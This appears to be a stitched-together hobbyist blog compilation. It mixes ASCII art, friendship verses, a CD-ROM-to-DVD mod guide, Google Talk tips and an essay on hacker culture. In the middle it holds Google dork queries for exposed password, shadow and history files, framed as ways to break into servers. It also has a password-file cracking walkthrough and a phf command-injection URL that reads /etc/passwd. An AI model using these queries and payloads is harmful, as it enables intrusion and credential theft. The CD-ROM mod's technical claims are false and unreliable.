**|--''**************'-;__********|\*****/******.,'
***\**********************`--.__,'_*'----*****,-'
***`\*****************************\`-'\__****,|
,--;/*******OUT OF THE 100 CRORE*/*****.|*,/
\__***U R MY BESTTEST FRIEND *******'|****/**/*
**./**_-,*************************_|***
**\__/*/************************,/********"
*******|**********************_/
*******|********************,/
*******\*******************/
********|**************/.-'
*********\***********_/
**********|*********/
***********|********|
******.****|********|
******;*****\*******/
******'******|*****|
*************\****_|
**************\_,/ B IN TOUCH

FRIENDSHIP_..._ ..._(... (  ...).._
  (_....__..._) _(.. (  ...)
  /(_...._)(_...._..._)\
  / / / / | \ \  \
/ /  /  /  | \  \  \
♥ ♥    ♥  ♥ ♥   ♥    ♥ 
♥   ♥ ♥   ♥ ♥ ♥ ♥
♥ ♥   ♥   ♥    ♥ ♥ ♥   ♥
♥   ♥   ♥  ♥   ♥ ♥
♥  ♥    ♥   ♥ ♥ ♥   ♥
♥   ♥ ♥   ♥   ♥   ♥   ♥
♥   ♥   ♥   ♥    ♥   ♥  ♥  
´´´, •♥♪♥♪♥♪♥♪♥♥♪♥♪♥♪♥♪♥♪♥•
´´´¢ /Λ\\\\\\\\\\\\\\\\♥♪♥♥♪♥♥♪♥♪♥♥♪♥♪♥•
´´¢ /.....\\\\\\\\\\\\\\\\♥♪♥♪♥♥♪♥♪♥♥♪♥♪♥♪♥•
´¢ / ๑۩ ๑_\\\\\\\\\\\\\\\\♥♪♥♪♥♪♥♪♥♪♥♪♥♪♥♪♥•
¢/¨à¹‘۩۞۩๑_\\\\\\\\\\\\\\\\´♪♥♪♥♪♥♥♪♥♪♥♪♥♪♥♪♥
¨▓¨.♪♥♥♪.▓♥♪♥♪♥♪♥♪♥♪♥♪♥♪♥♪♥•|||||
¨▓¨.♪♥♥♪.▓¨★★★★★¨¨¨¨¨¨¨¨¨★★★★★|||
¨▓¨.♪♥♥♪.▓¨★★★★★¨¨¨¨¨¨¨¨¨★★★★★|||
¨▓¨.♪♥♥♪.▓••••••••••••••••••••
¨♥♥======♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥

•.¸¸.•♥´¨`♥•.¸Some friends are like a Flower•.¸¸.•♥´¨`♥•.¸
and when they finally bloom•.¸¸.•♥´¨`♥•.¸they wilt away•.¸¸.•♥´¨`♥•.¸
in just one day •.¸¸.•♥´¨`♥•.¸and some times just by noon•.¸¸.•♥´¨`♥•.¸
Some friends are like a cloudy day •.¸¸.•♥´¨`♥•.¸
and when the sun's in sight•.¸¸.•♥´¨`♥•.¸
it gets blocked by the grayest cloud

MY DRACULA EAT YOU
______________,___.-'"'=;___,_
______________|\.'-~`-.`-`;/|
______________\.`_'.'~-.`_'./
______________(\`,__=-'__,'/)
____________.-'-.(_d\_/b_).-'-._
_________/'.-'___'_.---._'___'-.`\
_______/'__.'_(=____(_)____=)_'.__`\
______/'__.',__`-.__.-.__.-'__,'.__`\
_____(_____.'.___V_______V__;_'._____)
_____(____|::__`-,__.-.__,-'__::|____)
_____|___/|`:._______________.:'|\___|
_____|__/_|_`:.______________:'_|`\__|
_____|_|__(__:._____________.:__)__|_|
_____|_|___(_`:.____________:'_)___|_|
_____|_|____\_:.___________.:_/____|_|
_____|_|_____\`:._________.:'/_____|_|
_____)_(______`\`:._____.:'/'______)_(
_____(__`)______)_`:._.:'_(______(`__)
_____\__'__)__.'___________`.__(__`__/
______\__'_)_/___.'"```"'.___\_(_`__/
_______`'"`__\__(_________)__/__`"'`
______________`.`._______.'.'___________
_.`___``"""'''--`_)_____(_'--'''"""``___`.
(_(_(___...--'"'`_________`'"'--...___)_)_)

Modify Your CD-ROM to Watch DVD Movies

There are two types of CD-ROM drives we can mod:
24x to 40x
40x or higher
Drives slower than 24x are too old to be modded.
24x to 40x CD ROMs
Laser Head Adjustments:
The track pitch of CDs is 1.6 microns, and the track pitch of DVDs is only 0.8 microns. The minimum length of track pits of CDs is 0.843mm, and the minimum length of track pits of DVDs is 0.293mm. That's why DVD discs can store much more data in the size of a CD.
Pinpointing this situation, we need to adjust the laser head so it can read discs with smaller track pitchs and shorter track pits. Open up the CD-ROM drive, do you see a lens on the rail? That's the laser head. On the side of the laser head, there's a screw you can adjust.
This is the key of this mod.
This screw can adjust the size of the laser beam that lands on the disc. Referring to the above, after adjusting, the laser beam should be less than 0.293mm, to suit the needs of DVD discs. So turn that screw 2-3 times. I got this number through trial and error. Mark with a pencil, in case you forget how many times you turned that screw.
Speed adjustments:
DVD-ROM drives can play DVD movies smoothly at 4x speed. If we're modding a 32x CD-ROM drive, the rotation speed is obviously too high, increasing heat, and shortening the life of the drive.
So we need to decrease the speed of it.
Most people know that power supplies can provide 5V (red wire) and 12V (yellow wire) electricity output for Molex connectors. Find the Molex connector you'll plug into the modded CD-ROM drive, cut the yellow wire or insulate it with tape, so only 5V of electricity is transferred to the CD-ROM drive. The speed of the drive is now 32 * 5/17 = 9.41x and can now fulfill our requirements.

40x or higher CD ROMs
When 40x CD-ROM drives are released, most manufacturers are already producing DVD-ROM drives. To lower cost, they use the same core as DVD-ROM drives with DVD functions disabled. What we need to do here is to re-enable the DVD function.
Open up the CD-ROM, behind the circuit board, look for a jumper that says DVD JUMP. Find a jumper to connect this jumper. Thin metal wire also works fine.
OK, so the DVD function is unlocked, but we still need to decrease the speed. Use the instructions above on how to decrase the speed of the drive.
Notes:
Modded drives cannot be detected in POST, that means you cannot use it in DOS. But once you get into Windows, the drive works fine.
Modded drives have no region code problems.
Modded drives MIGHT NOT read DVD9 discs, that's why I said you can watch most retail DVDs in the beginning

Wednesday, October 24, 2007

G talk secret Parameters
There are a few secret parameters you can add to Google Talk and make it function differently. Following is the list of parameters

/nomutex: This allows you to open more than one instance of Google Talk
/autostart: Starts on it's own.
/forcestart: It forces it to start no matter what option was set.
/factoryreset: set settings back to default.
/S upgrade: Used when upgrading Google Talk
/register: This registers Google Talk in the registry, includig GMail Compose method.
/checkupdate: This keeps on checking for newer versions
/plaintextauth: It makes use of plain authentication mechanism instead then Google's GAIA mechanism.
/nogaiaauth: This disables GAIA authentication method. The same as above.
/gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
/mailto email@host.com: send an email with Gmail
/diag: start Google Talk in diagnostic mode

Most of them can be ued in the following way

Rifgt- click on the desktop.
Select "New " >>>"Shortcut"
Now browse through "My COMPUTER">>>"C:/">>>>"Program Files">>>>"Google">>"Google Talk">>>"Gtalk.exe"
Now add the extention that you want.
eg:- "......../gtalk.exe"/log.

Emotions!!
Following is the list of emoticons supported by gtalk.All these emotions appears in color in a conversation
:- :-O :-x :-P :-D :O :x :P :D
:) :( :) ;) ;( :'( : ;-) :-( :-)
B- B-O B-x B-P B-D B-) B-( B’( BO Bx BD
& some more

Gmail & talk supports animated emotions and they are
:- :=P :-D ;-) :-( :P :D :) :( ;-) ;) B-)

Chat Bots
A chatbot is a computer program designed to simulate conversation through a variety of methods.
They converse as much like people as their programming allows. If you want to add a chatbot to your Google Talk,
just add the account name as a friend.

Examples

indeedjobs@gmail.com (sends you fresh job postings matching your search query)

Conference Bot

Conference Bot is a bot that links together Google Talk users into one public conference room. This bot has been used as the basis of many bots for Google Talk. You can find a list of the active bots below.
If you want to create your own bot?
visit here



WM_COMMAND codes
Chat Window:
8001 - Start Call
40081 - Start muting microphone
8007 - Stop muting microphone
8008 - Stop Call
8015 - Show Send File dialog
8003 - Email
8013 - Start Voicemail
8008 - Stop Voicemail
8010 - Go off the record (both on and off)
8017 - View past chats
8011 - Block/unblock
Main Window:
40011 - Add Friend
40080 - Enable/Disable all notifications
40065 - Connection Monitor
40080 - Save all settings
40087 - Check for Updates Now
40088 - Inbox
40023 - About
40089 - Check Mail Now
40003 - Settings
40020 - Help
40088 - Email
40002 - Sign out
1404 - Voicemail

Add items to tray menu
Open Google Talk in Resource Hacker.
Go to menu -> 110 -> Click on 0. It will open as text.
Play with the menu items, for example you can add the item
MENUITEM "Settings", 40003, MFT_STRING, MFS_ENABLED
Click 'compile script'.
Close all instances of Google Talk!
Click File -> Save.


User Interface Editing
Open googletalk.exe in Resource Hacker.
Expand the Bitmap tree.
Save bitmaps 139, 5001-5104.
Edit the bitmaps in your image editor of choice to make them the color(s) you like.
Replace the original bitmaps with your edited bitmaps in Resource Hacker (Action > Replace Bitmap).
Save and try it out!.


Change Language
To change the language of Google Talk you will need to:

1.Open resource hacker.
2.Choose the menu: file, open.
3.Open the file c:\program files\google\google talk\googletalk.exe.
4.Now you will see a treeview on the left.
5.Double click on dialog.
6.Double click on 130.
7.Click on 0.
8.You will see a window and a bunch of text like 'CONTROL "Password:", 1003, STATIC'...
9.Change the text to another language, for example: 'CONTROL "Wachtwoord:", 1003, STATIC'...
10.Click 'Compile Script'.
11.Do this for all the dialogs.
12.Double click on 'String Table' in the treeview.
13.Click on 36.
14.Click on 0.
15.You will see a bunch of text like '567, "encountered an internal error'...
16.Change the text to another language, for example: '567, "er is een interne fout voorgekomen'...
17.Click 'Compile Script'.
18.Do this for all the string tables.
19.Make sure Google Talk is closed!!! and then click file, save.
20.When you reopen Google Talk it should now be in another language.


Registry Tweaks
You can edit most settings by opening regedit (start -> regedit),
and navigating to the key HKEY_CURRENT_USER\Software\Google\Google Talk

The "Google/Google Talk" key has several sub-keys that hold different option values:

Accounts: This one has subkeys for each different account that has logged in on the client. These keys have different values that store the username, password and connection options.
Autoupdate: Stores the current version information. When the client checks for updates it compares Google's response with these values. If an update is needed, it will download and update the new version.
Options: This is the most interesting part, where most of the current hacks should be used
Process: Stores the process ID. Probably used by Google Talk to detect if it's already running or not.
HKEY_CURRENT_USER\Software\Google\Google Talk\Options\api

The Google Talk API UID (unique ID).

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\chat_rect

Stores chat windows size/position.

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\filter_online

Only show online contacts.

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\font_charset

Stores what charset the font is in.

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\has_checked_orkut_picture

?

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\logged_in_once

Stores if you've ever signed in.

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\mailto_backup_handler

Path to default mail application (if not GMail).

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\mailto_backup_icon

Path to the default mail application's icon, index is separated with comma.

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\mailto_backup_registred

If the mail application is registred.

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\presence_note

?

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\theme

Specifys what theme you're using.

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\welcome_shown

If the welcome messages are shown or not.

HKEY_CURRENT_USER\Software\Google\Google Talk\Options\window_rect

Stores main windows size/position.



Google Talk Tips and Tricks
Shortcuts

* CTRL + Mousewheel up/down over input textbox: Change the font size of the textbox.
* F9: Open Gmail to send an email to your friend
* F11: Start a call with your friend
* F12: Stop the current call
* ESC: Close the current window
* ALT + ESC: Minimize the current window
* TAB: Switch between multiple chat windows
* CTRL + I: Same as TAB
* SHIFT + TAB: Same as TAB but in reverse order
* CTRL + TAB: Same as SHIFT + TAB
* Windows + ESC: Open Google Talk (if it's minimized, or in the tray)

Conversation Text

* A message can be 32767 characters long.
* Certain smileys are recognized by Google Talk and will be shown in blue.
:-| :-O :-x :-P :-D ;-) :-( :| :O :x :P :D :) :( ;-| ;-O ;-x ;-P ;-D ;-) ;-( ;| ;O ;x ;P ;D ;) ;( B-| B-O B-x B-P B-D B-) B-( B'( BO Bx BD B) B( B) And you can put a ' between the characters to get another one shown in blue.
* To write text in bold, put it between *asteriks*
* To write text in italic, put it between _underscores_
* You can insert special characters like ♥♫☺ with 'Start / Programs / Accessories / System Tools / Character Maps'.

Conversation Window

* Drag a conversation window on top of another and they will dock together.
* Drag a file onto the chat history and you'll send the file to the selected contact.
* When you see a message notification, you can right click it to close it without focusing the conversation window.

Conference Calls

* What you need to do to have conference calls: Open up a copy of Google Talk on all computers with which you wish to conference. After one copy is opened make a new shortcut for Google Talk but at the end of it add /nomutex. If you installed it to the default folder then your shortcut should read "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex. Open 2 instances of the software on every user's computer. After this start a chain: User 1 should connect on one instance to user 2. User 2 will connect on his second instance to user 3. User 3 will connect using his second instance back to user 1. With this chain everyone is connected to everyone.

Nickname & Status Message

* You can change your name in the Google Account page.
or To change the nickname need to go to your Gmail account and change the name there. Choose Settings, Accounts, and then Edit info. Click on the second radio button, and enter your custom name.
As a result all of your emails will have that nick as well, there is no way to seperate the two.
* You can add a website in your custom message, it will be clickable when someone opens a conversation window with you.

Contacts

* You don’t need to say Yes or No when someone wants to add you as a friend; you can simply ignore it, the request will go away. (On the other hand, someone with whom you chat often will automatically turn to be your friend, unless you disable this).
* The Gmail account 'user@gmail.com' can't be invited as your friend.

Sound & Video

* It's possible to broadcast music, MP3, etc.. through Google Talk.
Unplug your microphone. Double click on the speaker icon in the lower right corner. This will open
up "Volume Control". Select "Options" and then "Properties". Then check the button
next to "Recording" then click OK. You may also have to change your setting under
Mixer Device. Now the Recording Control screen should be up. On my computer I selected "Wave Out Mix". Click on the green phone in Google Talk and call your friend.

Secret Startup Parameters

* /nomutex: allows you to open more than one instance of Google Talk
* /autostart: when Google Talk is run with this parameter, it will check the registry settings to see if it needs to be started or not. If the "Start automatically with Windows" option is unchecked, it won't start.
* /forcestart: same as /autostart, but forces it to start no matter what option was set.
* /S upgrade: Used when upgrading Google Talk
* /register: registers Google Talk in the registry, includig the GMail Compose method.
* /checkupdate: check for newer versions
* /plaintextauth: uses plain authentication mechanism instead then Google's GAIA mechanism. Used for testing the plain method on Google's servers.
* /nogaiaauth: disables GAIA authentication method. The same as above.
* /factoryreset: set settings back to default.
* /gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
* /mailto email@host.com: send an email with Gmail
* /diag: start Google Talk in diagnostic mode
* /log: probably has something to do with the diagnostic logging
* /unregister: ?
* /embedding: ?

Others

* If there’s something you think is missing in Google Talk, send off a message to Google.
* There was a hidden game in Google Talk. In the about screen you could see 'play 23 21 13 16 21 19 . 7 1 13 5'. Each number represented a letter. a=1, b=2, c=3 .... When you translated this message it said: 'play wumpus.game'. To play this game you had to invite wumpus.game@gmail.com as a friend. wumpus.game@gmail.com is always offline now. You can still play Hunt the Wumpus here.
* Google Talk can dock into the Google Desktop Sidebar. Doubleclick on the titlebar in the Google Talk main window and it docks as a panel into the GDS and slides out when you click the top of the docked panel..

Google Hacks
Well, the Google’s query syntaxes discussed above can really help people to precise their search and get what they are exactly looking for.

Now Google being so intelligent search engine, hackers don’t mind exploiting its ability to dig much confidential and secret information from the net which they are not supposed to know. Now I shall discuss those techniques in details how hackers dig information from the net using Google and how that information can be used to break into remote servers.

Index Of

Using “Index of ” syntax to find sites enabled with Index browsing.

A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of “index of” syntax to get a list links to webserver which has got directory browsing enabled will be discussd below. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily.

Index of /admin
Index of /passwd
Index of /password
Index of /mail

"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess

"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"

Looking for vulnerable sites or servers using “inurl:” or “allinurl:”.

a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it.


b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link:

http://www.securiteam.com/exploits/2BUQ4S0SAW.html

c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. If this file is compromised and if contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”.

d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials.

For Example: Ingenium Learning Management System is a Web-based application for Windows based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 stores sensitive information insecurely in the config.txt file. For more information refer the following
links: http://www.securiteam.com/securitynews/6M00H2K5PG.html

Other similar search using “inurl:” or “allinurl:” combined with other syntax


inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php

inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto


Looking for vulnerable sites or servers using “intitle:” or “allintitle:”

a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

Other similar search using “intitle:” or “allintitle:” combined with other syntax

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov



Other interesting Search Queries

To search for sites vulnerable to Cross-Sites Scripting (XSS) attacks:

allinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php


To search for sites vulnerable to SQL Injection attacks:

allinurl:/privmsg.php
allinurl:/privmsg.php

G talk SECRITS TRIX

Play Music in G talk !!
It's possible to broadcast music, MP3, etc.. through Google Talk.
Unplug your microphone. Double click on the speaker icon in the lower right corner. This will open up "Volume Control". Select "Options" and then "Properties". Then check the button next to "Recording" then click OK. You may also have to change your setting under Mixer Device. Now the Recording Control screen should be up. On my computer I selected "Wave Out Mix". Click on the green phone in Google Talk and call your friend.

Perl.com Sends Visitors to Porn Site

Another tale to do with advertising, it just goes to show it’s really not a good idea to run JavaScript from a 3rd party source on your site, especially if you don’t want your visitors redirected to a porn site!

This is just what happened to Perl.com a few days ago.


Visitors to Perl.com, the O’Reilly Media-owned resource, were redirected on 17th of January to a link farm pushing porn sites.

Geeks who hit the site were sent to grepblogs-dot-net, a site that offers links to live adult webcams, erotic blogs and adult erotic fiction, among other things. Closing the Internet Explorer browser window that contains the site caused another link farm of dubious links to open, from a site called cnomy-dot-com. It carries more porno links and banner ads claiming visitors have won a free iPod.

“I was aghast,” said Tom Christiansen, author of many of the most popular Perl reference books. “I need to understand the nature of the problem.”

Odd that the name of the porn site is pretty geeky too, grep blog? Doesn’t sound like your run of the mile adult webcam directory right?

I guess spammers and getting more clued in, targeting a Perl site..using a geeky blog name - pretty smart.


The episode is the latest example of the perils that come from running ads and javascript from a third-party website. In recent months, rogue ads hosted on DoubleClick, Real Media and others have infected websites. While such services often make life easier for administrators, they also create opportunities for miscreants to defraud users.

Since 2006, HTML code on the Perl.com website has pulled javascript off of the grepblogs site, said Dale Dougherty, general manager of the O’Reilly divisions that’s responsible for upkeep of Perl.com. Once the content on the grepblogs site changed, visitors to the site were soon redirected to other sites. O’Reilly admins fixed the problem at about 6:30 a.m. California time on Friday by nullifying the script.

As many of the members here have done, blocking JavaScript may be a good idea, blocking ads may help or just not surfing at all!

Of course not using Internet Exploder Explorer also goes a long way.

Source: http://www.theregister.co.uk/2008/01/19/perl_site_redirects_to_porn_site/

Getting the Password File Through FTP

Well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.

Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted password from a shadowed
password file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system.

1.The first step that you would take is to download or copy the file.

2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking program you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) .

3. You then start up the cracker and follow the directions that it gives you.


The PHF Technique:

Well I wasn't sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But still i thought that you should know about it. So I decided to include it.

The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that's it! You just sit back and copy the file(if it works)

How Hackers Work


Thanks to the media, the word "hacker" has gotten a bad reputation. The word summons up thoughts of malicious computer users finding new ways to harass people, defraud corporations, steal information and maybe even destroy the economy or start a war by infiltrating military computer systems. While there's no denying that there are hackers out there with bad intentions, they make up only a small percentage of the hacker community.



Hackers from around the world gather at camps to
practice their hobby and trade tips.


The term computer hacker first showed up in the mid-1960s. A hacker was a programmer -- someone who hacked out computer code. Hackers were visionaries who could see new ways to use computers, creating programs that no one else could conceive. They were the pioneers of the computer industry, building everything from small applications to operating systems. In this sense, people like Bill Gates, Steve Jobs and Steve Wozniak were all hackers -- they saw the potential of what computers could do and created ways to achieve that potential.

A unifying trait among these hackers was a strong sense of curiosity, sometimes bordering on obsession. These hackers prided themselves on not only their ability to create new programs, but also to learn how other programs and systems worked. When a program had a bug -- a section of bad code that prevented the program from working properly -- hackers would often create and distribute small sections of code called patches to fix the problem. Some managed to land a job that leveraged their skills, getting paid for what they'd happily do for free.

As computers evolved, computer engineers began to network individual machines together into a system. Soon, the term hacker had a new meaning -- a person using computers to explore a network to which he or she didn't belong. Usually hackers didn't have any malicious intent. They just wanted to know how computer networks worked and saw any barrier between them and that knowledge as a challenge.

In fact, that's still the case today. While there are plenty of stories about malicious hackers sabotaging computer systems, infiltrating networks and spreading computer viruses, most hackers are just curious -- they want to know all the intricacies of the computer world. Some use their knowledge to help corporations and governments construct better security measures. Others might use their skills for more unethical endeavors.

In this article, we'll explore common techniques hackers use to infiltrate systems. We'll examine hacker culture and the various kinds of hackers as well as learn about famous hackers, some of whom have run afoul of the law.

Hackers and Crackers
Many computer programmers insist that the word "hacker" applies only to law-abiding enthusiasts who help create programs and applications or improve computer security. Anyone using his or her skills maliciously isn't a hacker at all, but a cracker.
Crackers infiltrate systems and cause mischief, or worse. Unfortunately, most people outside the hacker community use the word as a negative term because they don't understand the distinction between hackers and crackers.



The Hacker Toolbox

The main resource hackers rely upon, apart from their own ingenuity, is computer code. While there is a large community of hackers on the Internet, only a relatively small number of hackers actually program code. Many hackers seek out and download code written by other people. There are thousands of different programs hackers use to explore computers and networks. These programs give hackers a lot of power over innocent users and organizations -- once a skilled hacker knows how a system works, he can design programs that exploit it.



The ILOVEYOU Computer Virus was a malicious program
that plagued computers worldwide and caused millions of dollars in damages.


Malicious hackers use programs to:

* Hack passwords:There are many ways to hack someone's password, from educated guesses to simple algorithms that generate combinations of letters, numbers and symbols. The trial and error method of hacking passwords is called a brute force attack,meaning the hacker tries to generate every possible combination to gain access. Another way to hack passwords is to use a dictionary attack, program that inserts common words into password fields.
*Infect a computer or system with a virus: Computer viruses are programs designed to duplicate themselves and cause problems ranging from crashing a computer to wiping out everything on a system's hard drive. A hacker might install a virus by infiltrating a system, but it's much more common for hackers to create simple viruses and send them out to potential victims via email, instant messages, Web sites with downloadable content or peer-to-peer networks.
* Log keystrokes: Some programs allow hackers to review every keystroke a computer user makes. Once installed on a victim's computer, the programs record each keystroke, giving the hacker everything he needs to infiltrate a system or even steal someone's identity.
Gain backdoor access: Similar to hacking passwords, some hackers create programs that search for unprotected pathways into network systems and computers. In the early days of the Internet, many computer systems had limited security, making it possible for a hacker to find a pathway into the system without a username or password. Another way a hacker might gain backdoor access is to infect a computer or system with a Trojan horse.
*Create zombie computers: A zombie computer, or bot, is a computer that a hacker can use to send spam or commit Distributed Denial of Service (DDoS) attacks. After a victim executes seemingly innocent code, a connection opens between his computer and the hacker's system. The hacker can secretly control the victim's computer, using it to commit crimes or spread spam.
*Spy on e-mail: Hackers have created code that lets them intercept and read e-mail messages -- the Internet's equivalent to wiretapping. Today, most e-mail programs use encryption formulas so complex that even if a hacker intercepts the message, he won't be able to read it.

Hacker Hierarchy
Psychologist Marc Rogers says there are several subgroups of hackers -- newbies, cyberpunks, coders and cyber terrorists. Newbies are hackers who have access to hacking tools but aren't really aware of how computers and programs work. Cyberpunks are savvier and are less likely to get caught than a newbie while hacking a system, but they have a tendency to boast about their accomplishments. Coders write the programs other hackers use to infiltrate and navigate computer systems. A cyber terrorist is a professional hacker who infiltrates systems for profit -- he might sabotage a company or raid a corporation's databases for proprietary information [source: Knittel and Soto]



Hackers Culture

Individually, many hackers are antisocial. Their intense interest in computers and programming can become a communication barrier. Left to his or her own devices, a hacker can spend hours working on a computer program while neglecting everything else.

Computer networks gave hackers a way to associate with other people with their same interests. Before the Internet became easily accessible, hackers would set up and visit bulletin board systems (BBS). A hacker could host a bulletin board system on his or her computer and let people dial into the system to send messages, share information, play games and download programs. As hackers found one another, information exchanges increased dramatically.

Some hackers posted their accomplishments on a BBS, boasting about infiltrating secure systems. Often they would upload a document from their victims' databases to prove their claims. By the early 1990s, law enforcement officials considered hackers an enormous security threat. There seemed to be hundreds of people who could hack into the world's most secure systems at will [source: Sterling].

There are many Web sites dedicated to hacking. The hacker journal "2600: The Hacker Quarterly" has its own site, complete with a live broadcast section dedicated to hacker topics. The print version is still available on newsstands. Web sites like Hacker.org promote learning and include puzzles and competitions for hackers to test their skills.

Super Phreak
Before computer hackers, curious and clever individuals found ways to manipulate the phone system in a phenomenon called phreaking. Through phreaking, these individuals found ways to make long distance calls for free or sometimes just played pranks on other telephone users.



When caught -- either by law enforcement or corporations -- some hackers admit that they could have caused massive problems. Most hackers don't want to cause trouble; instead, they hack into systems just because they wanted to know how the systems work. To a hacker, a secure system is like Mt. Everest -- he or she infiltrates it for the sheer challenge. In the United States, a hacker can get into trouble for just entering a system. The Computer Fraud and Abuse Act outlaws unauthorized access to computer systems [source: Hacking Laws].

Not all hackers try to explore forbidden computer systems. Some use their talents and knowledge to create better software and security measures. In fact, many hackers who once used their skills to break into systems now put that knowledge and ingenuity to use by creating more comprehensive security measures. In a way, the Internet is a battleground between different kinds of hackers -- the bad guys, or black hats, who try to infiltrate systems or spread viruses, and the good guys, or white hats, who bolster security systems and develop powerful virus protection software.



Hackers work together to create "mashups" of
Yahoo applications at Yahoo Hack Day 2006.


Hackers on both sides overwhelmingly support open source software, programs in which the source code is available for anyone to study, copy, distribute and modify. With open source software, hackers can learn from other hackers' experiences and help make programs work better than they did before. Programs might range from simple applications to complex operating systems like Linux.

There are several annual hacker events, most of which promote responsible behavior. A yearly convention in Las Vegas called DEFCON sees thousands of attendees gather to exchange programs, compete in contests, participate in panel discussions about hacking and computer development and generally promote the pursuit of satisfying curiosity. A similar event called the Chaos Communication Camp combines low-tech living arrangements -- most attendees stay in tents -- and high-tech conversation and activities.

Hackers and the Law

